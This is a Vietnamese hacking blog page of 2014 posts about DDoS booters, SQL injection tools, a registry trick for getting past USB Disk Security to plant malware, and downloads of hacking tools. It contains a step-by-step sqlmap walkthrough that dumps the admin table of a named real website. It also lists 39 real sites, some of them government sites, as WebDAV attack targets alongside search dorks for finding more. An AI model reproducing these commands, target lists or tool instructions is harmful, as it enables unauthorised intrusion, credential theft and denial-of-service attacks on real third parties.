Showing posts with label tool hack. Show all posts
Showing posts with label tool hack. Show all posts

Thursday, November 13, 2014

Re-Boot V4 (Paradooter) Source

Re-Boot V4 (Paradooter) Source



Details/Features

Ajax support for a much nicer user experience
Homepage with news
Account settings (change password/email)

Admin features

Settings: change booter name, cooldown system, ip blacklist, booter statistics and more
Shells: add/manage shells
Users: add/delete/edit users
News: add/delete news



Pictures demo






10 Tools SQLi best 2014

10 Tools SQLi best 2014


1.BSQL Hacker

This is a useful tool for both experts and beginners that automates SQL Injection attacks on websites.

2. The Mole

This is an SQL Injection tool that uses the union technique or the boolean query-based technique.

3. Pangolin

This is a penetration testing tool developed by NOSEC. It is aimed at detecting and exploiting SQL injection vulnerabilities on websites.

4. SQLMap

This is an open source penetration testing tool that security professionals can use. Like the BSQL Hacker tool, this one also automates SQL Injection attacks.

5. Havij

This is an automated SQL injection tool that can be used by penetration testers in order to detect vulnerabilities in web applications and exploit them.

6. Enema SQLi

This is a dynamic penetration testing tool for professionals. It is an auto-hacking software.

7. Sqlninja
This is a tool targeted at exploiting SQL injection vulnerabilities. It uses the Microsoft SQL server as its back end.

8. Sqlsus

Written using the Perl programming language, this is an open source penetration testing tool for MySQL Injection and takeover.

9. Safe3 SQL Injector

This is a powerful penetration testing tool, which automates the process of detecting and exploiting SQL Injection vulnerabilities.

10. SQL Poizon
This tool includes php , asp , rfi , lfi dorks that can be used for penetration testing

End.

Ninja DDoser

Ninja DDoser


Virus Scan:

Archivo: Ninja DDosser.exe
SHA1: c65c463436e654151facc181d26a38dc6d5
Fecha scan: 05-12-12,08:05:12
Reporte generado por maarayaa.com
Resultado: 2 de 35

AVG Free Clean
ArcaVir Clean
Avast 5 Clean
AntiVir (Avira) Clean
BitDefender Clean
VirusBuster Internet Security Clean
Clam Antivirus Clean
COMODO Internet Security Clean
Dr.Web Clean
eTrust-Vet Clean
F-PROT Antivirus Clean
F-Secure Internet Security Clean
G Data Clean
IKARUS Security Clean
Kaspersky Antivirus Clean
McAfee Clean
MS Security Essentials Clean
ESET NOD32 Clean
Norman Clean
Norton Antivirus Clean
Panda Security Clean
A-Squared Clean
Quick Heal Antivirus Clean
Solo Antivirus Clean
Sophos Clean
Trend Micro Internet Security Clean
VBA32 Antivirus Clean
Vexira Antivirus Clean
Zoner AntiVirus Clean
Ad-Aware Trojan.Win32.Generic.pak!cobra
BullGuard Clean
Immunet Antivirus Clean
K7 Ultimate Clean
NANO Antivirus Clean
VIPRE Trojan.Win32.Generic.pak=21cobra


How To Hack USB Disk Security

 How To Hack USB Disk Security


USB Disk Security là một phần mềm ngăn chặn các truy cập trái phép của ổ đĩa USB có nghĩa là bạn không thể sao chép bất kỳ tập tin từ máy tính vào USB của bạn hoặc từ USB của bạn vào máy tính. Ngoài ra nó phát hiện hầu hết các loại virus ở trong ổ đĩa Flash mà ngày nay được gọi là ổ đĩa CD/DVD. Và trong thế giới hiện đại ngày nay hầu hết tất cả mọi người đều sử dụng nó. Vì vậy nếu bạn muốn cài 1 Malware hoặc bất cứ thứ gì vào máy tính của ai đó để đánh cắp thông tin từ máy tính của của nạn nhân, nhưng phần mềm này sẽ không cho phép bạn làm bất cứ điều gì, nó sẽ nhắc bạn điền 1 mật khẩu nào đó. Nếu bạn ngồi đoán mò, hên xui thì có thể ra còn không thì rất mất thời gian.


Cho nên trong bài viết lần này sẽ có 1 cái thủ thuật nho nhỏ giúp các bạn crack

 *Tiến Hành
- Ẩn tổ hợp phím Windows + R để mở hộp thoại Run và gõ regedit
- Chọn HKEY_LOCAL_MACHINE/SOFTWARE/ZbshaLab/USBGuard



* Ở đây có file: pwd =>> Chính là mật khẩu ta cần tìm
- Nhấn đúp chuột vào pwd ta được mã MD5:


- Cuối cùng các bạn crack mã MD5 ra ta sẽ có được kết quả 


END TUTORIAL




Sunday, November 9, 2014

Syslogger admin Finder new 2014

Syslogger admin Finder_new 2014



link download : http://upfile.vn/xgLgKrZm7QBm/1337-admin-p4ge-find3r-exe.html
link download 2: https://hostr.co/pKKcTse5SP1R

SQLMAP CƠ BẢN

SQLMAP CƠ BẢN


Demo: link lỗi sqli 
http://autohoabinh.com/?page=products_detail&id=296&catid=2'
Vào thư mục chưa bộ công cụ sqlmap
cd /pentest/database/sqlmap/
đầu tiên ta get database nhé

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" --dbs



ở đây --dbs là databases
thêm 1 số cái nữa như
--dbs DBMS databases
--tables DBMS database tables
--columns DBMS database table columns
--schema DBMS schema
--dump dump dữ liệu

Database nhận đc là athb_db nhé.​
tiếp tục ta get các table như sau

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db --tables




table tbl_admin là table chúng ta cần khai thác đúng hok nào,giờ ta lấy các column nhé​

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin --columns




kết quả nhận đc như sau​





bây giờ ta sẽ dump các trường id,name và pass nhé.​ta dump trường id trước nào

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C id --dump



kết quả nhận đc là id ->1 .tương tự ta dump các trường còn lại ​

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C name --dump



kết quả nhận đc thì user là admin nhé​

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C pass --dump



end tutorial.

Thursday, June 12, 2014

Tuesday, June 3, 2014

List web cho ae test webdav ( có cả dork )

List web cho ae test webdav :-)

  1. abcinvestor.com 
  2. co.rhvacnet.com 
  3. thinkgiga.com 
  4. www.gofsg.com 
  5. pla.hbu.cn 
  6. cd.whlib.gov.cn 
  7. ftp.graphor.co.il 
  8. www.statsrecord.net 
  9. labweb.fsba.edu.br 
  10. g-gconcretesolutions.com 
  11. www.highsnabfarm.co.uk 
  12. www.hzgsfda.gov.cn 
  13. www.cdrqb.com 
  14. wlax.4wmt.com 
  15. www.e-ctasia.com 
  16. finance.cedare.int 
  17. edanku.bemycio.com 
  18. www.xtxgsx.com 
  19. www.palatedisplay.com 
  20. fjnh.gov.cn 
  21. vabc.cn 
  22. qx.xiangtan.gov.cn 
  23. wsc.utilgraph.it 
  24. shengenxi.shoe-brand.cn 
  25. www.supoil.com 
  26. catalogo.btgitalia.it 
  27. www.muncrosales.gov.ar 
  28. eticaretyap.net 
  29. www.tiser.cn 
  30. www.sdcydh.com 
  31. nl.meteokust.be 
  32. www.kfzy.sdnu.edu.cn 
  33. webapps.bwpress.com 
  34. www.hlgljy.com 
  35. b2c.atipicihiphopcity.com 
  36. www.js-szyy.com 
  37. www.shyyfw.gov.cn 
  38. www.hyperoutlet.cz 
  39. http://www.elcsfj.gov.cn/
Còn đây là dork :

Nih Klo Mau Maenan WebDav Dork Webdav intitle:’’Directory Listing For /» inurl:webdav tomcat intitle:’’Directory Listing For /» inurl:webdav inurl:*.edu/*.asp inurl:.gov.*/*.asp inurl:*.gov/*.asp inurl:.org/*.asp inurl:.ag/*.asp inurl:.it/*.asp inurl:.uk/*.asp inurl:.co.il/*.asp inurl:.com/*.asp inurl:.co.id/*.asp inurl:.ah.cn/*.asp inurl:.bj.cn/*.asp inurl:.cq.cn/*.asp inurl:.fj.cn/*.asp inurl:.gd.cn/*.asp inurl:.gs.cn/*.asp inurl:.gz.cn/*.asp inurl:.gx.cn/*.asp inurl:.ha.cn/*.asp inurl:.hb.cn/*.asp inurl:.he.cn/*.asp inurl:.hi.cn/*.asp inurl:.hl.cn/*.asp inurl:.hn.cn/*.asp inurl:.jl.cn/*.asp inurl:.js.cn/*.asp inurl:.jx.cn/*.asp inurl:.ln.cn/*.asp inurl:.nm.cn/*.asp inurl:.nx.cn/*.asp inurl:.qh.cn/*.asp inurl:.sc.cn/*.asp inurl:.sd.cn/*.asp inurl:.sh.cn/*.asp inurl:.sn.cn/*.asp inurl:.sx.cn/*.asp inurl:.tj.cn/*.asp inurl:.tw.cn/*.asp inurl:.xj.cn/*.asp inurl:.xz.cn/*.asp inurl:.yn.cn/*.asp inurl:.zj.cn/*.asp inurl:.ac.cn/*.asp inurl:.com.cn/*.asp inurl:.edu.cn/*.asp inurl:.gov.cn/*.asp inurl:.net.cn/*.asp inurl:.org.cn/*.asp

Wednesday, May 21, 2014

Tổng hợp một số tool hack cần thiết cho người mới bắt đầu .


1.Password Cracking Tools:

a) John the ripper-http://www.openwall.com/john/
b) THC hydra-http://www.thc.org/thc-hydra/
c) Brutus-http://www.hoobie.net/brutus/
d) L0PhtCrack-http://www.l0phtcrack.com/
e) SAMInside-http://insidepro.com
f) Cain and abel-http://www.oxid.it/cain.html
g) Pwdump-http://www.foofus.net/fizzgig/pwdump/

2.Pentesting Tools:

a) Metasploit framework- http://www.metasploit.com/
b) Canvas- http://www.immunitysec.com/products-canvas.shtml

3.Sql injector Tools:

a) Sqlihelper
b) Havij
c) SQL Exploiter

4.Website Vulnerability Scanner:

a) Acunetix- http://www.acunetix.com/
b) Rational appscan- http://www.ibm.com/software/awdtools/appscan/

5.Vulnerability Scanner:

a) Nessus-http://www.nessus.org/
b) Retina-http://www.eeye.com/html/Products/Retina/index.html
c) Sara-http://www-arc.com/sara/

6.Port Scanner:

a) Nmap- http://nmap.org/
b) Angry Ip scanner- http://www.angryziber.com/ipscan/
c) Super Scan- http://www.foundstone.com/us/resources/proddesc/superscan.htm

7.Intrusion detection Tools:

a) Snort-http://www.snort.org/
b) Sguil-http://sguil.sourceforge.net/
8.Live CDs:

a) Ophcrack- http://ophcrack.sourceforge.net/
b) Backtrack- http://www.backtrack-linux.org/
c) Hiren’s boot cd- http://www.hiren.info/pages/bootcd
d) Ultimate boot cd- http://www.ultimatebootcd.com/


9.Wireless Tools:

a) Wireshark- http://www.wireshark.org/
b) Kismet-http://www.kismetwireless.net/
c) Aircrack- http://www.aircrack-ng.org/
d) Netstumbler- http://www.stumbler.net/

10.Steganography Tools: A list of few "STEGANOGRAPHY TOOLS " free to DOWNLOAD.

11.IP Tracing Tools:

a) Neo Trace- http://www.networkingfiles.com/neotrace/
b) Visual Trace-http://www.visualiptrace.com

12.Software Cracking Tools:

a) Debuggers-OllyDbg,WinDbg
b) Unpackers-QUnpack
c) DisAssemblers-WIN32Dasm
d) Decompilers-Boomerang,Mocha,JAD
e) Hex Editors-Hexworkshop,Hview, HxDSetupEN
A list of few "REVERSE ENGINEERING" tools free to Download.

13.Virtual Enviroment Software:

a) Vmware- http://www.vmware.com/
b) Virtual box- http://www.virtualbox.org/
c) Sandboxie- http://www.sandboxie.com/

Friday, April 25, 2014

Share 1 số tool hay cho anh em !

Mộ số tool hack hay !

BSQLHacker :

link download : BSQLHacker

Find-Link-admin :

link download : Find Link admin

Prosql  :

link download : Prosql

SQL Helper :

link download : SQL Helper

XSS Scanner :

link download : XSS Scanner

Tks các bạn đa xem !